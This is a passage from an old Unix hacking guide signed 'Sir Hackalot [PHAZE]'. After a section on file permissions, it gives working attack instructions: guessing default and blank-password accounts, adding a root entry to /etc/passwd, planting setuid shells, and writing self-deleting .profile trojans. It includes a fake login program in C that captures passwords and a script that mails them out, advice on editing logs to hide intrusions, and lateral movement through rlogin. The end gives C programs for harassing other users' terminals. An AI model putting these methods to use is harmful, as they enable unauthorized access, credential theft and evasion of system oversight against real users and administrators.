/usr
/usr/sirhack
/usr/sirhack/src
/usr/scythian
/usr/prophet

Hopefully, you understood that part, and you should.  Everything spawns from
the root directory.

o File Permissions!
------------------

Now, this is really the biggie.  File Permissions.  It is not that hard to
understand file permissions, but I will explain them deeply anyway.

OK, now you must think of user groups as well as user names.  Everyone
belongs to a group.  at the $ prompt, you could type in 'id' to see what
group you are in.  Ok, groups are used to allow people access certain things,
instead of just having one person controlling/having access to certain files.
Remember also, that Unix looks at someone's UID to determine access, not
user name.

Ok.  File permissions are not really that complicated.  Each file has an owner
This OWNER is usually the one who creates the file, either by copying a file
or just by plain editing one.  The program CHOWN can be used to give someone
ownership of a file.  Remember that the owner of a file must be the one who
runs CHOWN, since he is the only one that can change the permissions of a file
Also, there is a group owner, which is basically the group that you were in
when the file was created.  You would use chgrp to change the group a file is
in.

Now, Files can have Execute permissions, read permissions, or write permission.
If you have execute permission, you know that you can just type in the name
of that program at the command line, and it will execute.  If you have read
permission on a file, you can obviously read the file, or do anything that
reads the file in, such as copying the file or cat[ing] it (Typing it).
If you do NOT have access to read a file, you can't do anything that requires
reading in the file.  This is the same respect with write permission.  Now,
all the permissions are arranged into 3 groups.  The first is the owner's
permissions.  He may have the permissions set for himself to read and execute
the file, but not write to it.  This would keep him from deleting it.
The second group is the group permissions.  Take an elongated directory
for an example:
 $ ls -l runme
 r-xrwxr-- sirhack       root     10990 March 21  runme

ok.  Now, "root" is the groupname this file is in.  "sirhack" is the owner.
Now, if the group named 'root' has access to read, write and execute, they
could do just that.  Say .. Scythian came across the file, and was in the root
user group.  He could read write or execute the file.  Now, say datawiz came
across it, but was in the "users" group.  The group permissions would not
apply to him, meaning he would have no permissions, so he couldn't touch
the file, right?  Sorta.  There is a third group of permissions, and this is
the "other" group.  This means that the permissions in the "other" group
apply to everyone but the owner, and the users in the same group as the file.
Look at the directory entry above.  the r-x-rwxr-- is the permissions line.
The first three characters are the permissions for the owner (r-x).  The
"r-x" translates to "Read and execute permissions, but no write permissions"
the second set of three, r-xRWXr-- (the ones in capital letters) are the group
permissions.  Those three characters mean "Read, write, and execution allowed"
The 3rd set, r-xrwxR-- is the permissions for everyone else.  It means
"Reading allowed, but nothing else".  A directory would look something like
this:
 $ ls -l
 drwxr-xr-x sirhack     root  342 March 11  src

A directory has a "d" at the beggining of the permissions line.  Now, the
owner of the directory (sirhack) can read from the directory, write in the
directory, and execute programs from the directory.  The root group and every-
one else can only read from the directory, and execute off the directory.
So, If I changed the directory to be executable only, this is
what it would look like:
 $ chmod go-r
 $ ls
 drwx--x--x sirhack   root  342  March 11  src

Now, if someone went into the directory besides "sirhack", they could only
execute programs in the directory.  If they did an "ls" to get a directory
of src, when they were inside src, it would say "cannot read directory".
If there is a file that is readable in the directory, but the directory is
not readable, it is sometimes possible to read the file anyway.

If you do not have execute permissions in a directory, you won't be able to
execute anything in the directory, most of the time.

_____________________________________________________________________________

--------------
Hacking:
--------------
        The first step in hacking a UNIX is to get into the operating system
by finding a valid account/password.  The object of hacking is usually to
get root (full privileges), so if you're lucky enough to get in as root,
you need not read anymore of this hacking phile , and get into the
"Having Fun" Section.  Hacking can also be just to get other's accounts also.

Getting IN
----------
        The first thing to do is to GET IN to the Unix.  I mean, get past
the login prompt.  That is the very first thing.  When you come across a UNIX,
sometimes it will identify itself by saying something like,
"Young INC. Company UNIX"

or Just
"Young Inc.  Please login"

        Here is where you try the defaults I listed.  If you get in with those
you can get into the more advanced hacking (getting root). If you do something
wrong at login, you'll get the message
"login incorrect"
This was meant to confuse hackers, or keep the wondering.  Why?
Well, you don't know if you've enterred an account that does not exist, or one
that does exist, and got the wrong password.  If you login as root and it says
"Not on Console", you have a problem.  You have to login as someone else,
and use SU to become root.

   Now, this is where you have to think.  If you cannot get in with a
default, you are obviously going to have to find something else to
login as.  Some systems provide a good way to do this by allowing the use
of command logins.  These are ones which simply execute a command, then
logoff.  However, the commands they execute are usually useful.  For instance
there are three common command logins that tell you who is online at the
present time.  They are:
        who
        rwho
        finger

    If you ever successfully get one of these to work, you can write down
the usernames of those online, and try to logon as them.  Lots of unsuspecting
users use there login name as their password.  For instance, the user
"bob" may have a password named "bob" or "bob1".   This, as you know, is
not smart, but they don't expect a hacking spree to be carried out on
them.  They merely want to be able to login fast.
   If a command login does not exist, or is not useful at all, you will
have to brainstorm.  A good thing to try is to use the name of the unix
that it is identified as.  For instance, Young INC's Unix may have an account
named "young"
        Young, INC.  Please Login.
        login: young
        UNIX SYSTEM V REL 3.2
        (c)1984 AT&T..
        ..
        ..
        ..

   Some unixes have an account open named "test".  This is also a default,
but surprisingly enough, it is sometimes left open.  It is good to try to
use it.  Remember, brainstorming is the key to a unix that has no apparent
defaults open.  Think of things that may go along with the Unix.  type
in stuff like "info", "password", "dial", "bbs" and other things that
may pertain to the system.  "att" is present on some machines also.

ONCE INSIDE -- SPECIAL FILES
----------------------------
        There are several files that are very important to the UNIX
environment.  They are as follows:

/etc/passwd  - This is probably the most important file on a Unix.  Why?
               well, basically, it holds the valid usernames/passwords.
               This is important since only those listed in the passwd
               file can login, and even then some can't (will explain).
               The format for the passwordfile is this:

username:password:UserID:GroupID:description(or real name):homedir:shell

                Here are two sample entries:

sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh
demo::101:100:Test Account:/usr/demo:/usr/sh

                In the first line, sirhack is a valid user.  The second
                field, however, is supposed to be a password, right?  Well,
                it is, but it's encrypted with the DES encryption standard.
                the part that says "&a,Ty" may include a date after the comma
                (Ty) that tells unix when the password expires.  Yes, the
                date is encrypted into two alphanumeric characters (Ty).

                In the Second example, the demo account has no password.
                so at Login, you could type in:

login: demo
UNIX system V
(c)1984 AT&T
..
..

                But with sirhack, you'd have to enter a password.  Now,
                the password file is great, since a lot of times, you;ll
                be able to browse through it to look for unpassworded
                accounts.  Remember that some accounts can be restricted
                from logging in, as such:

bin:*:2:2:binaccount:/bin:/bin/sh

                The '*' means you won't be able to login with it.  Your
                only hope would be to run an SUID shell (explained later).

        A note about the DES encryption:  each unix makes its own unique
"keyword" to base encryption off of.  Most of the time its just random letters
and numbers.  Its chosen at installation time by the operating system.
        Now, decrypting DES encrypted things ain't easy.  Its pretty much
impossible.  Especially decrypting the password file (decrypting the password
field within the password file to be exact).  Always beware a hacker who
says he decrypted a password file.  He's full of shit.  Passwords are
never decrypted on unix, but rather, a system call is made to a function
called "crypt" from within the C language, and the string you enter as
the password gets encrypted, and compared to the encrypted password.  If
they match, you're in.  Now, there are password hackers, but they donot
decrypt the password file, but rather, encrypt words from a dictionary
and try them against every account (by crypting/comparing) until it finds
a match (later on!).  Remember, few, if none, have decrypted the password
file successfuly.

/etc/group - This file contains The valid groups.  The group file is usually
             defined as this:
             groupname:password:groupid:users in group

         Once again, passwords are encrypted here too.  If you see a blank
         in the password entry you can become part of that group by
         using the utility "newgrp". Now, there are some cases in
         which even groups with no password will allow only certain
         users to be assigned to the group via the newgrp command. Usually,
         if the last field is left blank, that means any user can use newgrp
         to get that group's access.  Otherwise, only the users specified in
         the last field can enter the group via newgrp.

        Newgrp is just a program that will change your group current
        group id you are logged on under to the one you specify.  The
        syntax for it is:  newgrp groupname
        Now, if you find a group un passworded, and use newgrp to
        enter it, and it asks for a password, you are not allowed to use
        the group.  I will explain this further in The "SU & Newgrp" section.

/etc/hosts - this file contains a list of hosts it is connected to thru
             a hardware network (like an x.25 link or something), or sometimes
             just thru UUCP.  This is a good file when you are hacking a
             large network, since it tells you systems you can use with
             rsh (Remote Shell, not restricted shell), rlogin, and telnet,
             as well as other ethernet/x.25 link programs.

/usr/adm/sulog (or su_log) - the file sulog (or su_log) may be found in
             Several directories, but it is usually in /usr/adm.  This file
             is what it sounds like.  Its a log file, for the program SU.
             What it is for is to keep a record of who uses SU and when.
             whenever you use SU, your best bet would be to edit this file
             if possible, and I'll tell you how and why in the section
             about using "su".

/usr/adm/loginlog
or /usr/adm/acct/loginlog -
        This is a log file, keeping track of the logins.
        Its purpose is merely for accounting and "security review".  Really,
        sometimes this file is never found, since a lot of systems keep the
        logging off.

/usr/adm/errlog
or errlog -     This is the error log.  It could be located anywhere.  It
                keeps track of all serious and even not so serious errors.
                Usually, it will contain an error code, then a situation.
                the error code can be from 1-10, the higher the number, the
                worse the error.  Error code 6 is usually used when you try
                to hack.  "login" logs your attempt in errlog with error code
                6.  Error code 10 means, in a nutshell, "SYSTEM CRASH".

/usr/adm/culog - This file contains entries that tell when you used cu,
                 where you called and so forth.  Another security thing.

/usr/mail/<userLogin> - this is where the program "mail" stores its mail.
                        to read a particular mailbox, so they are called,
                        you must be that user, in the user group "mail" or
                        root.  each mailbox is just a name.  for instance,
                        if my login was "sirhack" my mail file would usually
                        be: /usr/mail/sirhack

/usr/lib/cron/crontabs - This contains the instructions for cron, usually.
                         Will get into this later.

/etc/shadow - A "shadowed" password file.  Will talk about this later.


-- The BIN account --

       Well, right now, I'd like to take a moment to talk about the account
"bin".  While it is only a user level account, it is very powerful.  It is
the owner of most of the files, and on most systems, it owns /etc/passwd,
THE most important file on a unix.  See, the bin account owns most of the
"bin" (binary) files, as well as others used by the binary files, such
as login.  Now, knowing what you know about file permissions, if bin owns
the passwd file, you can edit passwd and add a root entry for yourself.
You could do this via the edit command:
$ ed passwd
10999 [The size of passwd varies]
* a
sirhak::0:0:Mr. Hackalot:/:/bin/sh
{control-d}
* w
* q
$

Then, you could say: exec login, then you could login as sirhack, and
you'd be root.

/\/\/\/\/\/\/\/\/
Hacking..........
/\/\/\/\/\/\/\/\/

--------------
Account Adding
--------------

        There are other programs that will add users to the system, instead
of ed.  But most of these programs will NOT allow a root level user to be
added, or anything less than a UID of 100.  One of these programs is
named "adduser".  Now, the reason I have stuck this little section in, is
for those who want to use a unix for something useful.  Say you want a
"mailing address".  If the unix has uucp on it, or is a big college,
chances are, it will do mail transfers.  You'll have to test the unix
by trying to send mail to a friend somewhere, or just mailing yourself.
If the mailer is identified as "smail" when you mail yourself (the program
name will be imbedded in the message) that probably means that the system
will send out UUCP mail.  This is a good way to keep in contact with people.
Now, this is why you'd want a semi-permanent account.  The way to achieve this
is by adding an account similar to those already on the system.  If all the
user-level accounts (UID >= 100) are three letter abbriviations, say
"btc" for Bill The Cat, or "brs" for bill ryan smith, add an account
via adduser, and make a name like sally jane marshall or something
(they don't expect hackers to put in female names) and have the account
named sjm.  See, in the account description (like Mr. Hackalot above), that
is where the real name is usually stored.  So, sjm might look like this:
     sjm::101:50:Sally Jane Marshall:/usr/sjm:/bin/sh
Of course, you will password protect this account, right?
Also, group id's don't have to be above 100, but you must put the account
into one that exists.  Now, once you login with this account, the first
thing you'd want to do is execute "passwd" to set a password up.  If you
don't, chances are someone else 'll do it for you (Then you'll be SOL).

-------------------
Set The User ID
-------------------

        This is porbably one of the most used schemes.  Setting up an "UID-
Shell". What does this mean?  Well, it basically means you are going
to set the user-bit on a program.  The program most commonly used is
a shell (csh,sh, ksh, etc).  Why?  Think about it:  You'll have access
to whatever the owner of the file does.  A UID shell sets the user-ID of
the person who executes it to the owner of the program.  So if root
owns a uid shell, then you become root when you run it.  This is an
alternate way to become root.

        Say you get in and modify the passwd file and make a root level
account unpassworded, so you can drop in.  Of course, you almost HAVE to
get rid of that account or else it WILL be noticed eventually.  So, what
you would do is set up a regular user account for yourself, then, make
a uid shell.  Usually you would use /bin/sh to do it.  After adding
the regular user to the passwd file, and setting up his home directory,
you could do something like this:
(assume you set up the account: shk)
 # cp /bin/sh /usr/shk/runme
 # chmod a+s /usr/shk/runme

Thats all there would be to it.  When you logged in as shk, you could just
type in:

 $ runme
 #

See?  You'd then be root.  Here is a thing to do:

$ id
uid=104(shk) gid=50(user)

$ runme
# id
uid=104(shk) gid=50(user) euid=0(root)
#

The euid is the "effective" user ID.  UID-shells only set the effective
userid, not the real user-id.  But, the effective user id over-rides the
real user id.  Now, you can, if you wanted to just be annoying, make
the utilities suid to root.  What do I mean?  For instance, make 'ls'
a root 'shell'. :

# chmod a+s /bin/ls
# exit
$ ls -l /usr/fred
..
......
etc crap

Ls would then be able to pry into ANY directory.  If you did the same to
"cat" you could view any file.  If you did it to rm, you could delete any
file.  If you did it to 'ed', you could edit any-file (nifty!), anywhere on
the system (usually).


How do I get root?
------------------

   Good question indeed.  To make a program set the user-id shell to root,
you have to be root, unless you're lucky.  What do I mean?  Well, say
you find a program that sets the user-id to root.  If you have access
to write to that file, guess what?  you can copy over it, but keep
the uid bit set.  So, say you see that the program chsh is setting
the user id too root.  You can copy /bin/sh over it.

$ ls -l
rwsrwsrws  root     other  10999 Jan 4  chsh
$ cp /bin/sh chsh
$ chsh
#

See?  That is just one way.  There are others, which I will now talk
about.

More on setting the UID
-----------------------

        Now, the generic form for making a program set the User-ID bit
is to use this command:

chmod a+s file

Where 'file' is a valid existing file.  Now, only those who own the file
can set the user ID bit.  Remember, anything YOU create, YOU own, so if
you copy th /bin/sh, the one you are logged in as owns it, or IF the
UID is set to something else, the New UID owns the file.  This brings
me to BAD file permissions.



II. HACKING : Bad Directory Permissions

        Now, what do I mean for bad directory permissions?  Well, look for
files that YOU can write to, and above all, DIRECTORIES you can write to.
If you have write permissions on a file, you can modify it.  Now, this comes
in handy when wanting to steal someone's access.  If you can write to
a user's .profile, you are in business.  You can have that user's .profile
create a suid shell for you to run when You next logon after the user.
If the .profile is writable to you, you can do this:

$ ed .profile
[some number will be here]
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
(control-d)
? w
[new filesize will be shown]
? q
$

  Now, when the user next logs on, the .profile will create .runme which
  will set your ID to the user whose .profile you changed.  Ideally, you'll
  go back in and zap those lines after the suid is created, and you'll create
  a suid somewhere else, and delete the one in his dir.  The .runme will
  not appear in the user's REGULAR directory list, it will only show up
  if he does "ls -a" (or ls with a -a combination), because, the '.' makes
  a file hidden.

The above was a TROJAN HORSE, which is one of the most widely used/abused
method of gaining more power on a unix.  The above could be done in C via
the system() command, or by just plain using open(), chmod(), and the like.
* Remember to check and see if the root user's profile is writeable *
* it is located at /.profile (usually) *


   The BEST thing that could happen is to find a user's directory writeable
   by you.  Why?  well, you could replace all the files in the directory
   with your own devious scripts, or C trojans.  Even if a file is not
   writeable by you, you can still overwrite it by deleteing it.  If you
   can read various files, such as the user's .profile, you can make a
   self deleting trojan as so:

 $ cp .profile temp.pro
 $ ed .profile
 1234
 ? a
 cp /bin/sh .runme
 chmod a+x .runme
 chmod a+s .runme
 mv temp.pro .profile
 (control-d)
 ? w
 [another number]
 ? q
 $ chown that_user temp.pro

  What happens is that you make a copy of the .profile before you change it.
  Then, you change the original.  When he runs it, the steps are made, then
  the original version is placed over the current, so if the idiot looks in
  his .profile, he won't see anything out of the ordinary, except that he
  could notice in a long listing that the change date is very recent, but
  most users are not paranoid enough to do extensive checks on their files,
  except sysadm files (such as passwd).

  Now, remember, even though you can write to a dir, you may not be able
  to write to a file without deleting it.  If you do not have write perms
  for that file, you'll have to delete it and write something in its place
  (put a file with the same name there). The most important thing to remember
  if you have to delete a .profile is to CHANGE the OWNER back after you
  construct a new one (hehe) for that user.  He could easily notice that his
  .profile was changed and he'll know who did it.  YES, you can change the
  owner to someone else besides yourself and the original owner (as to throw
  him off), but this is not wise as keeping access usually relies on the fact
  that they don't know you are around.

  You can easily change cron files if you can write to them.  I'm not going
  to go into detail about cronfile formats here, just find the crontab files
  and modify them to create a shell somewhere as root every once in a while,
  and set the user-id.

III. Trojan Horses on Detached terminals.
        Basically this:  You can send garbage to a user's screen and
        mess him up bad enough to force a logoff, creating a detached
        account.  Then you can execute a trojan horse off that terminal in
        place of login or something, so the next one who calls can hit the
        trojan horse.  This USUALLY takes the form of a fake login and
        write the username/pw entererred to disk.

        Now, there are other trojan horses available for you to write.  Now,
        don't go thinking about a virus, for they don't work unless ROOT runs
        them.  Anyway, a common trjan would be a shell script to get the
        password, and mail it to you.  Now, you can replace the code for
        the self deleting trojan with one saying something like:
        echo "login: \c"
        read lgin
        echo off (works on some systems)
        (if above not available...: stty -noecho)
        echo "Password:\c"
        read pw
        echo on
        echo "Login: $lgin - Pword: $pw" | mail you

        Now, the best way to use this is to put it in a seperate script file
        so it can be deleted as part of the self deleting trojan.  A quick
        modification, removing the "login: " and leaving the password
        may have it look like SU, so you can get the root password.  But
        make sure the program deletes itself.  Here is a sample trojan
        login in C:

        #include <stdio.h>
        /* Get the necessary defs.. */
        main()
        {
          char *name[80];
          char *pw[20];
          FILE *strm;
          printf("login: ");
          gets(name);
          pw = getpass("Password:");
          strm = fopen("/WhereEver/Whateverfile","a");
          fprintf(strm,"User: (%s), PW [%s]\n",name,pw);
          fclose(strm);
          /* put some kind of error below... or something... */
          printf("Bus Error - Core Dumped\n");
          exit(1);
          }

        The program gets the login, and the password, and appends it to
        a file (/wherever/whateverfile), and creates the file if it can,
        and if its not there.  That is just an example.  Network Annoyances
        come later.

 IV.  Odd systems

        There may be systems you can log in to with  no problem, and find some
slack menu, database, or word processor as your shell, with no way to the
command interpreter (sh, ksh, etc..).  Don't give up here.  Some systems will
let you login as root, but give you a menu which will allow you to add an
account.  However, ones that do this usually have some purchased software
package running, and the people who made the software KNOW that the people
who bought it are idiots, and the thing will sometimes only allow you to
add accounts with user-id 100 or greater, with their special menushell as
a shell.  You probably won't get to pick the shell, the program will probably
stick one on the user you created which is very limiting.  HOWEVER, sometimes
you can edit accounts, and it will list accounts you can edit on the screen.
HOWEVER, these programs usually only list those with UIDS > 100 so you don't
edit the good accounts, however, they donot stop you from editing an account
with a UID < 100.  The "editing" usually only involves changing the password
on the account.  If an account has a * for a password, the standard passwd
program which changes programs, will say no pw exists, and will ask you to
enter one. (wallah! You have just freed an account for yourself.  Usually
bin and sys have a * for a password).  If one exists you'll have to enter
the old Password (I hope you know it!) for that account.  Then, you are
in the same boat as before. (BTW -- These wierd systems are usually
Xenix/386, Xenix/286, or Altos/286)
        With word processors, usually you can select the load command,
and when the word processor prompts for a file, you can select the passwd
file, to look for open accounts, or at least valid ones to hack.  An example
would be the informix system.  You can get a word processor with that such
as Samna word, or something, and those Lamers will not protect against
shit like that.  Why?  The Passwd file HAS to be readable by all for the most
part, so each program can "stat" you.  However, word processors could be made
to restrict editing to a directory, or set of directories.  Here is an
example:

        $ id
        uid=100(sirhack) gid=100(users)
        $ sword
        (word processor comes up)
        (select LOAD A FILE)
        <Edit File>: /etc/passwd
        <Loading..>
        (you see: )
        root:dkdjkgsf!!!:0:0:Sysop:/:/bin/sh
        sirhack:dld!k%%^%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh
        datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh
        ...

Now I have found an account to take over! "datawiz" will get me in with no
trouble, then I can change his password, which he will not like at all.
Some systems leave "sysadm" unpassworded (stupid!), and now, Most versions
of Unix, be it Xenix, Unix, BSD, or whatnot, they ship a sysadm shell which
will menu drive all the important shit, even creating users, but you must
have ansi or something.

        You can usually tell when you'll get a menu.  Sometimes on UNIX
        SYSTEM V, when it says TERM = (termtype), and is waiting for
        you to press return or whatever, you will probably get a menu.. ack.

V. Shadowed Password files
        Not much to say about this.  all it is, is when every password field
        in the password file has an "x" or just a single character.  What
        that does is screw you, becuase you cannot read the shadowed password
        file, only root can, and it contains all the passwords, so you will
        not know what accounts have no passwords, etc.

There are a lot of other schemes for hacking unix, lots of others, from
writing assembly code that modifies the PCB through self-changing code which
the interrupt handler doesn't catch, and things like that.  However, I do
not want to give away everything, and this was not meant for advanced Unix
Hackers, or atleast not the ones that are familiar with 68xxx, 80386 Unix
assembly language or anything.  Now I will Talk about Internet.



--->>> InterNet <<<---
        Why do I want to talk about InterNet?  Well, because it is a prime
example of a TCP/IP network, better known as a WAN (Wide-Area-Network).
Now, mainly you will find BSD systems off of the Internet, or SunOS, for
they are the most common.  They may not be when System V, Rel 4.0, Version
2.0 comes out.  Anyway,  these BSDs/SunOSs like to make it easy to jump
from one computer to another once you are logged in.  What happens is
EACH system has a "yello page password file". Better known as yppasswd.
If you look in there, and see blank passwords you can use rsh, rlogin, etc..
to slip into that system.  One system in particular I came across had a
a yppasswd file where *300* users had blank passwords in the Yellow Pages.
Once I got in on the "test" account, ALL I had to do was select who I wanted
to be, and do: rlogin -l user (sometimes -n).  Then it would log me onto
the system I was already on, through TCP/IP.  However, when you do this,
remember that the yppasswd only pertains to the system you are on at
the time.  To find accounts, you could find the yppasswd file and do:

% cat yppasswd | grep ::

Or, if you can't find yppasswd..

% ypcat passwd | grep ::

On ONE system (which will remain confidential), I found the DAEMON account
left open in the yppasswd file.  Not bad.  Anyway,  through one system
on the internet, you can reach many.  Just use rsh, or rlogin, and look
in the file: /etc/hosts for valid sites which you can reach.  If you get
on to a system, and rlogin to somewhere else, and it asks for a password,
that just means one of two things:

A. Your account that you have hacked on the one computer is on the target
   computer as well.  Try to use the same password (if any) you found the
   hacked account to have.  If it is a default, then it is definitly on the
   other system, but good luck...

B. rlogin/rsh passed your current username along to the remote system, so it
   was like typing in your login at a "login: " prompt.  You may not exist on
   the other machine.  Try "rlogin -l login_name", or rlogin -n name..
   sometimes, you can execute "rwho" on another machine, and get a valid
   account.

Some notes on Internet servers.  There are "GATEWAYS" that you can get into
that will allow access to MANY internet sites.  They are mostly run off
a modified GL/1 or GS/1.  No big deal.  They have help files.  However,
you can get a "privilged" access on them, which will give you CONTROL of
the gateway.. You can shut it down, remove systems from the Internet, etc..
When you request to become privileged, it will ask for a password.  There is
a default.  The default is "system".  I have come across *5* gateways with
the default password.  Then again, DECNET has the same password, and I have
come across 100+ of those with the default privileged password.  CERT Sucks.
a Gateway that led to APPLE.COM had the default password.  Anyone could
have removed apple.com from the internet.  Be advised that there are many
networks now that use TCP/IP.. Such as BARRNET, LANET, and many other
University networks.

--** Having Fun **--

Now, if nothing else, you should atleast have some fun.  No, I do not mean
go trashing hardrives, or unlinking directories to take up inodes, I mean
play with online users.  There are many things to do.  Re-direct output
to them is the biggie.  Here is an example:
 $ who
 loozer   tty1
 sirhack  tty2
 $ banner You Suck >/dev/tty1
 $
 That sent the output to loozer.  The TTY1 is where I/O is being performed
 to his terminal (usually a modem if it is a TTY).  You can repetitiously
 banner him with a do while statement in shell, causing him to logoff. Or
 you can get sly, and just screw with him.  Observe this C program:

#include <stdio.h>
#include <fcntl.h>
#include <string.h>

main(argc,argument)
int argc;
char *argument[];
{
	int handle;
	char *pstr,*olm[80];
	char *devstr = "/dev/";
	int acnt = 2;
	FILE *strm;
	pstr = "";
	if (argc == 1) {
                printf("OL (OneLiner) Version 1.00 \n");
                printf("By Sir Hackalot [PHAZE]\n");
		printf("\nSyntax: ol tty message\n");
		printf("Example: ol tty01 You suck\n");
		exit(1);
	}
	printf("OL (OneLiner) Version 1.0\n");
        printf("By Sir Hackalot [PHAZE]\n");
	if (argc == 2) {
		strcpy(olm,"");
		printf("\nDummy! You forgot to Supply a ONE LINE MESSAGE\n");
		printf("Enter one Here => ");
		gets(olm);
	}
	strcpy(pstr,"");
	strcat(pstr,devstr);
        strcat(pstr,argument[1]);
	printf("Sending to: [%s]\n",pstr);
	strm = fopen(pstr,"a");
	if (strm == NULL) {
		printf("Error writing to: %s\n",pstr);
		printf("Cause: No Write Perms?\n");
		exit(2);
	}
	if (argc == 2) {
                if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s): \n",logname());
                fprintf(strm,"%s\n",olm);
		fclose(strm);
		printf("Message Sent.\n");
		exit(0);
	}
        if (argc > 2) {                             
                if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s):\n",logname());
		while (acnt <= argc - 1) {
			fprintf(strm,"%s ",argument[acnt]);
			acnt++;
		}
		fclose(strm);
		printf("Message sent!\n");
		exit(0);
	}
}

What the above does is send one line of text to a device writeable by you
in /dev.  If you try it on a user named "sirhack" it will notify sirhack
of what you are doing.  You can supply an argument at the command line, or
leave a blank message, then it will prompt for one.  You MUST supply a
Terminal.  Also, if you want to use ?, or *, or (), or [], you must not
supply a message at the command line, wait till it prompts you.  Example:

$ ol tty1 You Suck!
OL (OneLiner) Version 1.00
by Sir Hackalot [PHAZE]
Sending to: [/dev/tty1]
Message Sent!
$
Or..
$ ol tty1
OL (OneLiner) Version 1.00
by Sir Hackalot [PHAZE]
Dummy! You Forgot to Supply a ONE LINE MESSAGE!
Enter one here => Loozer! Logoff (NOW)!! ^G^G
Sending to: [/dev/tty1]
Message Sent!
$

  You can even use it to fake messages from root.  Here is another:


/*
 * Hose another user
 */

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <signal.h>
#include <utmp.h>
#include <time.h>
#include <termio.h>
#include <sys/utsname.h>

#define NMAX    sizeof(ubuf.ut_name)

struct	utmp ubuf;
struct	termio oldmode, mode;
struct	utsname name;
int yn;        
int loop = 0;
char    *realme[50] = "Unknown";
char    *strcat(), *strcpy(), me[50]  = "???", *him, *mytty, histty[32];
char	*histtya, *ttyname(), *strrchr(), *getenv();
int	signum[] = {SIGHUP, SIGINT, SIGQUIT, 0}, logcnt, eof(), timout();
FILE	*tf;

main(argc, argv)
int argc;
char *argv[];
{
	register FILE *uf;
	char c1, lastc;
	int goodtty = 0;
	long clock = time((long *) 0);
	struct tm *localtime();
	struct tm *localclock = localtime( &clock );
	struct stat stbuf;
	char psbuf[20], buf[80], window[20], junk[20];
	FILE *pfp, *popen();

	if (argc < 2) {
                printf("usage: hose user [ttyname]\n");
		exit(1);
	}
        him = argv[1];

	if (argc > 2)
		histtya = argv[2];
	if ((uf = fopen("/etc/utmp", "r")) == NULL) {
		printf("cannot open /etc/utmp\n");
		exit(1);
	}
	cuserid(me);
	if (me == NULL) {
		printf("Can't find your login name\n");
		exit(1);
	}
    mytty = ttyname(2);
    if (mytty == NULL) {
		printf("Can't find your tty\n");
		exit(1);
	}
	if (stat(mytty, &stbuf) < 0) {
		printf("Can't stat your tty -- This System is bogus.\n");
	}
	if ((stbuf.st_mode&02) == 0) {
		printf("You have write permissions turned off (hehe!).\n");
	}

    if (histtya) {
		if (!strncmp(histtya, "/dev/", 5))
			histtya = strrchr(histtya, '/') + 1;
		strcpy(histty, "/dev/");
		strcat(histty, histtya);
	}
	while (fread((char *)&ubuf, sizeof(ubuf), 1, uf) == 1) {
		if (ubuf.ut_name[0] == '\0')
			continue;
		if (!strncmp(ubuf.ut_name, him, NMAX)) {
			logcnt++;
			if (histty[0]==0) {
				strcpy(histty, "/dev/");
				strcat(histty, ubuf.ut_line);
			}
			if (histtya) {
				if (!strcmp(ubuf.ut_line, histtya))
					goodtty++;
			}
		}
	}
	fclose(uf);
        if (logcnt==0) {
		printf("%s not found! (Not logged in?)\n", him);
		exit(1);
	}

	if (histtya==0 && logcnt > 1) {
		printf("%s logged more than once\nwriting to %s\n", him, histty+5);
	}
	if (access(histty, 0) < 0) {
		printf("No such tty? [%s]\n",histty);
		exit(1);
	}
	signal(SIGALRM, timout);
	alarm(5);
	if ((tf = fopen(histty, "w")) == NULL)
		goto perm;
	alarm(0);
	if (fstat(fileno(tf), &stbuf) < 0)
		goto perm;
	if (geteuid() != 0 && (stbuf.st_mode&02) == 0)
		goto perm;
	ioctl(0, TCGETA, &oldmode);		/* save tty state */
	ioctl(0, TCGETA, &mode);
	sigs(eof);
	uname(&name);
        if (strcmp(him,"YOURNAMEHERE") == 0) yn = 1;
  if (yn == 1 ) {
    fprintf(tf, "\r(%s attempted to HOSE You with NW)\r\n",me);
    fclose(tf);
    printf("Critical Error Handler: %s running conflicting process\n",him);
    exit(1);
}
    fflush(tf);
	mode.c_cc[4] = 1;
	mode.c_cc[5] = 0;
	mode.c_lflag &= ~ICANON;
	ioctl(0, TCSETAW, &mode);
	lastc = '\n';


printf("Backspace / Spin Cursor set lose on: %s\n",him);
   while (loop == 0) {
   c1 = '\b'; 
   write(fileno(tf),&c1,1); 
   sleep(5); 
fprintf(tf,"\\\b|\b/\b-\b+\b"); 
   fflush(tf); 
   }




perm:
printf("Write Permissions denied!\n");
exit(1);
}

timout()
{

printf("Timeout opening their tty\n");
exit(1);
}

eof()
{
printf("Bye..\n");
ioctl(0, TCSETAW, &oldmode);
exit(0);
}

ex()
{
	register i;
	sigs(SIG_IGN);
	i = fork();
	if (i < 0) {
		printf("Try again\n");
		goto out;
	}
	if (i == 0) {
		sigs((int (*)())0);
		execl(getenv("SHELL")?getenv("SHELL"):"/bin/sh","sh","-t",0);
		exit(0);
	}
	while(wait((int *)NULL) != i)
		;
	printf("!\n");
out:
	sigs(eof);
}

sigs(sig)
int (*sig)();
{
	register i;
	for (i=0; signum[i]; i++)
		signal(signum[i], sig);
}



What the above is, is a modified version of the standard write command.
What it does, is spin the cursor once, then backspace once over the
screen of the user it is run on. All though, it does not physically affect
input, the user thinks it does.  therefore, he garbles input.  The sleep(xx)
can be changed to make the stuff happen more often, or less often.
If you put your login name in the "YOURNAMEHERE" slot, it will protect you
from getting hit by it, if someone off a Public access unix leeches the
executable from your directory.
You could make a shorter program that does almost the same thing, but
you have to supply the terminal, observe:

/* Backspace virus, by Sir Hackalot [Phaze] */
#include <stdio.h>
#include <fcntl.h>
main(argc,argv)
char *argv[];
int argc;
{
        int x = 1;
        char *device = "/dev/";
        FILE *histty;
        if (argc == 1) {
        printf("Bafoon.  Supply a TTY.\n");
        exit(1);
        }
        strcat(device,argv[1]);
        /* Make the filename /dev/tty.. */
        histty = fopen(device,"a");
        if (histty == NULL) {
        printf("Error opening/writing to tty.  Check their perms.\n");
        exit(1);
        }
        printf("BSV - Backspace virus, By Sir Hackalot.\n");
        printf("The Sucker on %s is getting it!\n",device);
        while (x == 1) {
        fprintf(histty,"\b\b");
        fflush(histty);
        sleep(5);
        }
        }

Thats all there is to it.  If you can write to their tty, you can use this on
